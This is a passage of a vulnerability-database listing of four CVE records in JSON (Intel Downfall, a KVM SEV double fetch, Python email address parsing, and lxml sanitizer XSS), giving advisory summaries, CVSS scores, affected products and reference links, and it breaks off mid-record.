EPSS score ?
Summary
Information exposure through microarchitectural state after transient execution in certain vector execution units for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
References
Impacted products
▼ | Vendor | Product |
---|---|---|
n/a | Intel(R) Processors |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:28:42.939Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "url": "http://xenbits.xen.org/xsa/advisory-435.html" }, { "name": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html", "tags": [ "x_transferred" ], "url": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html" }, { "tags": [ "x_transferred" ], "url": "https://downfall.page" }, { "tags": [ "x_transferred" ], "url": "https://aws.amazon.com/security/security-bulletins/AWS-2023-007/" }, { "tags": [ "x_transferred" ], "url": "https://access.redhat.com/solutions/7027704" }, { "tags": [ "x_transferred" ], "url": "https://xenbits.xen.org/xsa/advisory-435.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00013.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230811-0001/" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5474" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5475" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T7WO5JM74YJSYAE5RBV4DC6A4YLEKWLF/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OL7WI2TJCWSZIQP2RIOLWHOKLM25M44J/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HKREYYTWUY7ZDNIB2N6H5BUJ3LE5VZPE/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00026.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HKKYIK2EASDNUV4I7EFJKNBVO3KCKGRR/" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2022-40982", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-07-31T20:33:43.011314Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-31T20:43:52.375Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Intel(R) Processors", "vendor": "n/a", "versions": [ { "status": "affected", "version": "See references" } ] } ], "descriptions": [ { "lang": "en", "value": "Information exposure through microarchitectural state after transient execution in certain vector execution units for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "description": "information disclosure", "lang": "en" }, { "cweId": "CWE-1342", "description": "Information exposure through microarchitectural state after transient execution", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-08-11T02:37:05.423Z", "orgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce", "shortName": "intel" }, "references": [ { "name": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html", "url": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html" }, { "url": "https://downfall.page" }, { "url": "https://aws.amazon.com/security/security-bulletins/AWS-2023-007/" }, { "url": "https://access.redhat.com/solutions/7027704" }, { "url": "https://xenbits.xen.org/xsa/advisory-435.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00013.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230811-0001/" }, { "url": "https://www.debian.org/security/2023/dsa-5474" }, { "url": "https://www.debian.org/security/2023/dsa-5475" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T7WO5JM74YJSYAE5RBV4DC6A4YLEKWLF/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OL7WI2TJCWSZIQP2RIOLWHOKLM25M44J/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HKREYYTWUY7ZDNIB2N6H5BUJ3LE5VZPE/" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00026.html" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HKKYIK2EASDNUV4I7EFJKNBVO3KCKGRR/" } ] } }, "cveMetadata": { "assignerOrgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce", "assignerShortName": "intel", "cveId": "CVE-2022-40982", "datePublished": "2023-08-11T02:37:05.423Z", "dateReserved": "2022-09-27T00:28:29.203Z", "dateUpdated": "2024-08-03T12:28:42.939Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-4155
Vulnerability from cvelistv5
Published
2023-09-13 16:11
Modified
2024-08-02 07:17
Severity ?
EPSS score ?
Summary
Sev-es / sev-snp vmgexit double fetch vulnerability
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/security/cve/CVE-2023-4155 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2213802 | issue-tracking, x_refsource_REDHAT |
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:17:12.158Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-4155" }, { "name": "RHBZ#2213802", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2213802" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "affected", "product": "kernel", "vendor": "n/a" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://packages.fedoraproject.org/", "defaultStatus": "affected", "packageName": "kernel", "product": "Fedora", "vendor": "Fedora" } ], "datePublic": "2023-08-04T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A flaw was found in KVM AMD Secure Encrypted Virtualization (SEV) in the Linux kernel. A KVM guest using SEV-ES or SEV-SNP with multiple vCPUs can trigger a double fetch race condition vulnerability and invoke the `VMGEXIT` handler recursively. If an attacker manages to call the handler multiple times, they can trigger a stack overflow and cause a denial of service or potentially guest-to-host escape in kernel configurations without stack guard pages (`CONFIG_VMAP_STACK`)." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-367", "description": "Time-of-check Time-of-use (TOCTOU) Race Condition", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-09-13T16:11:39.213Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-4155" }, { "name": "RHBZ#2213802", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2213802" } ], "timeline": [ { "lang": "en", "time": "2023-05-09T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-08-04T00:00:00+00:00", "value": "Made public." } ], "title": "Sev-es / sev-snp vmgexit double fetch vulnerability", "x_redhatCweChain": "CWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-4155", "datePublished": "2023-09-13T16:11:39.213Z", "dateReserved": "2023-08-04T14:48:29.732Z", "dateUpdated": "2024-08-02T07:17:12.158Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-27043
Vulnerability from cvelistv5
Published
2023-04-18 00:00
Modified
2024-08-02 12:01
Severity ?
EPSS score ?
Summary
The email module of Python through 3.11.3 incorrectly parses e-mail addresses that contain a special character. The wrong portion of an RFC2822 header is identified as the value of the addr-spec. In some applications, an attacker can bypass a protection mechanism in which application access is granted only after verifying receipt of e-mail to a specific domain (e.g., only @company.example.com addresses may be used for signup). This occurs in email/_parseaddr.py in recent versions of Python.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T12:01:32.288Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4ZAEFSFZDNBNJPNOUTLG5COISGQDLMGV/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/75DTHSTNOFFNAWHXKMDXS7EJWC6W2FUC/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PHVGRKQAGANCSGFI3QMYOCIMS4IFOZA5/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PU6Y2S5CBN5BWCBDAJFTGIBZLK3S2G3J/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDRDDPDN3VFIYXJIYEABY6USX5EU66AG/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RDDC2VOX7OQC6OHMYTVD4HLFZIV6PYBC/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SINP4OVYNB2AGDYI2GS37EMW3H3F7XPZ/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VZXC32CJ7TWDPJO6GY2XIQRO7JZX5FLP/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XWMBD4LNHWEXRI6YVFWJMTJQUL5WOFTS/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YQVY5C5REXWJIORJIL2FIL3ALOEJEF72/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ARI7VDSNTQVXRQFM6IK5GSSLEIYV4VZH/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BQAKLUJMHFGVBRDPEY57BJGNCE5UUPHW/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HXYVPEZUA3465AEFX5JVFVP7KIFZMF3N/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N6M5I6OQHJABNEYY555HUMMKX3Y4P25Z/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NEUNZSZ3CVSM2QWVYH3N2XGOCDWNYUA3/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ORLXS5YTKN65E2Q2NWKXMFS5FWQHRNZW/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P2MAICLFDDO3QVNHTZ2OCERZQ34R2PIC/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P2W2BZQIHMCKRI5FNBJERFYMS5PK6TAH/" }, { "tags": [ "x_transferred" ], "url": "https://github.com/python/cpython/issues/102988" }, { "tags": [ "x_transferred" ], "url": "http://python.org" }, { "tags": [ "x_transferred" ], "url": "https://python-security.readthedocs.io/vuln/email-parseaddr-realname.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230601-0003/" }, { "name": "FEDORA-2023-88fbb78cd3", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ORLXS5YTKN65E2Q2NWKXMFS5FWQHRNZW/" }, { "name": "FEDORA-2023-555b4d49b1", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PHVGRKQAGANCSGFI3QMYOCIMS4IFOZA5/" }, { "name": "FEDORA-2023-2f86a608b2", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PU6Y2S5CBN5BWCBDAJFTGIBZLK3S2G3J/" }, { "name": "FEDORA-2023-1bb427c240", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWMBD4LNHWEXRI6YVFWJMTJQUL5WOFTS/" }, { "name": "FEDORA-2023-87771f4249", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4ZAEFSFZDNBNJPNOUTLG5COISGQDLMGV/" }, { "name": "FEDORA-2023-c61a7d5227", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SINP4OVYNB2AGDYI2GS37EMW3H3F7XPZ/" }, { "name": "FEDORA-2023-d577604e6a", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VZXC32CJ7TWDPJO6GY2XIQRO7JZX5FLP/" }, { "name": "FEDORA-2023-7d223ee343", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RDDC2VOX7OQC6OHMYTVD4HLFZIV6PYBC/" }, { "name": "FEDORA-2023-c0bf8c0c4e", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NEUNZSZ3CVSM2QWVYH3N2XGOCDWNYUA3/" }, { "name": "FEDORA-2023-f96ff39b59", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YQVY5C5REXWJIORJIL2FIL3ALOEJEF72/" }, { "name": "FEDORA-2023-8085628fff", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/75DTHSTNOFFNAWHXKMDXS7EJWC6W2FUC/" }, { "name": "FEDORA-2023-d01f8a69b4", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P2W2BZQIHMCKRI5FNBJERFYMS5PK6TAH/" }, { "name": "FEDORA-2023-b245e992ea", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ARI7VDSNTQVXRQFM6IK5GSSLEIYV4VZH/" }, { "name": "FEDORA-2023-0583eedde7", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SOX7BCN6YL7B3RFPEEXPIU5CMTEHJOKR/" }, { "name": "FEDORA-2024-06ff0a6def", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/N6M5I6OQHJABNEYY555HUMMKX3Y4P25Z/" }, { "name": "FEDORA-2024-3ab90a5b01", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P2MAICLFDDO3QVNHTZ2OCERZQ34R2PIC/" }, { "name": "FEDORA-2023-0583eedde7", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HXYVPEZUA3465AEFX5JVFVP7KIFZMF3N/" }, { "name": "FEDORA-2024-8df4ac93d7", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QDRDDPDN3VFIYXJIYEABY6USX5EU66AG/" }, { "name": "FEDORA-2024-94e0390e4e", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BQAKLUJMHFGVBRDPEY57BJGNCE5UUPHW/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The email module of Python through 3.11.3 incorrectly parses e-mail addresses that contain a special character. The wrong portion of an RFC2822 header is identified as the value of the addr-spec. In some applications, an attacker can bypass a protection mechanism in which application access is granted only after verifying receipt of e-mail to a specific domain (e.g., only @company.example.com addresses may be used for signup). This occurs in email/_parseaddr.py in recent versions of Python." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-02-25T02:06:33.426180", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/python/cpython/issues/102988" }, { "url": "http://python.org" }, { "url": "https://python-security.readthedocs.io/vuln/email-parseaddr-realname.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230601-0003/" }, { "name": "FEDORA-2023-88fbb78cd3", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ORLXS5YTKN65E2Q2NWKXMFS5FWQHRNZW/" }, { "name": "FEDORA-2023-555b4d49b1", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PHVGRKQAGANCSGFI3QMYOCIMS4IFOZA5/" }, { "name": "FEDORA-2023-2f86a608b2", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PU6Y2S5CBN5BWCBDAJFTGIBZLK3S2G3J/" }, { "name": "FEDORA-2023-1bb427c240", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWMBD4LNHWEXRI6YVFWJMTJQUL5WOFTS/" }, { "name": "FEDORA-2023-87771f4249", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4ZAEFSFZDNBNJPNOUTLG5COISGQDLMGV/" }, { "name": "FEDORA-2023-c61a7d5227", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SINP4OVYNB2AGDYI2GS37EMW3H3F7XPZ/" }, { "name": "FEDORA-2023-d577604e6a", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VZXC32CJ7TWDPJO6GY2XIQRO7JZX5FLP/" }, { "name": "FEDORA-2023-7d223ee343", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RDDC2VOX7OQC6OHMYTVD4HLFZIV6PYBC/" }, { "name": "FEDORA-2023-c0bf8c0c4e", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NEUNZSZ3CVSM2QWVYH3N2XGOCDWNYUA3/" }, { "name": "FEDORA-2023-f96ff39b59", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YQVY5C5REXWJIORJIL2FIL3ALOEJEF72/" }, { "name": "FEDORA-2023-8085628fff", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/75DTHSTNOFFNAWHXKMDXS7EJWC6W2FUC/" }, { "name": "FEDORA-2023-d01f8a69b4", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P2W2BZQIHMCKRI5FNBJERFYMS5PK6TAH/" }, { "name": "FEDORA-2023-b245e992ea", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ARI7VDSNTQVXRQFM6IK5GSSLEIYV4VZH/" }, { "name": "FEDORA-2023-0583eedde7", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SOX7BCN6YL7B3RFPEEXPIU5CMTEHJOKR/" }, { "name": "FEDORA-2024-06ff0a6def", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/N6M5I6OQHJABNEYY555HUMMKX3Y4P25Z/" }, { "name": "FEDORA-2024-3ab90a5b01", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P2MAICLFDDO3QVNHTZ2OCERZQ34R2PIC/" }, { "name": "FEDORA-2023-0583eedde7", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HXYVPEZUA3465AEFX5JVFVP7KIFZMF3N/" }, { "name": "FEDORA-2024-8df4ac93d7", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QDRDDPDN3VFIYXJIYEABY6USX5EU66AG/" }, { "name": "FEDORA-2024-94e0390e4e", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BQAKLUJMHFGVBRDPEY57BJGNCE5UUPHW/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-27043", "datePublished": "2023-04-18T00:00:00", "dateReserved": "2023-02-27T00:00:00", "dateUpdated": "2024-08-02T12:01:32.288Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-27783
Vulnerability from cvelistv5
Published
2020-12-03 16:39
Modified
2024-08-04 16:25
Severity ?
EPSS score ?
Summary
A XSS vulnerability was discovered in python-lxml's clean module. The module's parser didn't properly imitate browsers, which caused different behaviors between the sanitizer and the user's page. A remote attacker could exploit this flaw to run arbitrary HTML/JS code.
References
▼ | URL | Tags |
---|---|---|
https://bugzilla.redhat.com/show_bug.cgi?id=1901633 | x_refsource_MISC | |
https://www.debian.org/security/2020/dsa-4810 | vendor-advisory, x_refsource_DEBIAN | |
https://lists.debian.org/debian-lts-announce/2020/12/msg00028.html | mailing-list, x_refsource_MLIST | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TMHVKRUT22LVWNL3TB7HPSDHJT74Q3JK/ | vendor-advisory, x_refsource_FEDORA | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JKG67GPGTV23KADT4D4GK4RMHSO4CIQL/ | vendor-advisory, x_refsource_FEDORA | |
https://www.oracle.com//security-alerts/cpujul2021.html | x_refsource_MISC | |
https://advisory.checkmarx.net/advisory/CX-2020-4286 | x_refsource_MISC | |
https://security.netapp.com/advisory/ntap-20210521-0003/ | x_refsource_CONFIRM |
Impacted products
▼ | Vendor | Product |
---|---|---|
n/a | python-lxml |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T16:25:42.427Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1901633" }, { "name": "DSA-4810", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2020/dsa-4810" }, { "name": "[debian-lts-announce] 20201218 [SECURITY] [DLA 2467-2] lxml regression update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00028.html" }, { "name": "FEDORA-2020-0e055ea503", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TMHVKRUT22LVWNL3TB7HPSDHJT74Q3JK/" }, { "name": "FEDORA-2020-307946cfb6", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JKG67GPGTV23KADT4D4GK4RMHSO4CIQL/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://advisory.checkmarx.net/advisory/CX-2020-4286" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20210521-0003/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "python-lxml", "vendor": "n/a", "versions": [ { "status": "affected", "version": "lxml-4.6.2" } ] } ], "descriptions": [ { "lang": "en", "value": "A XSS vulnerability was discovered in python-lxml\u0027s clean module. The module\u0027s parser didn\u0027t properly imitate browsers, which caused different behaviors between the sanitizer and the user\u0027s page. A remote attacker could exploit this flaw to run arbitrary HTML/JS code." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-79", "description": "CWE-79", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2021-07-20T22:54:48", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1901633" }, { "name": "DSA-4810", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2020/dsa-4810" }, { "name": "[debian-lts-announce] 20201218 [SECURITY] [DLA 2467-2] lxml regression update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00028.html" }, { "name": "FEDORA-2020-0e055ea503", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TMHVKRUT22LVWNL3TB7HPSDHJT74Q3JK/" }, { "name": "FEDORA-2020-307946cfb6", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JKG67GPGTV23KADT4D4GK4RMHSO4CIQL/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "tags": [ 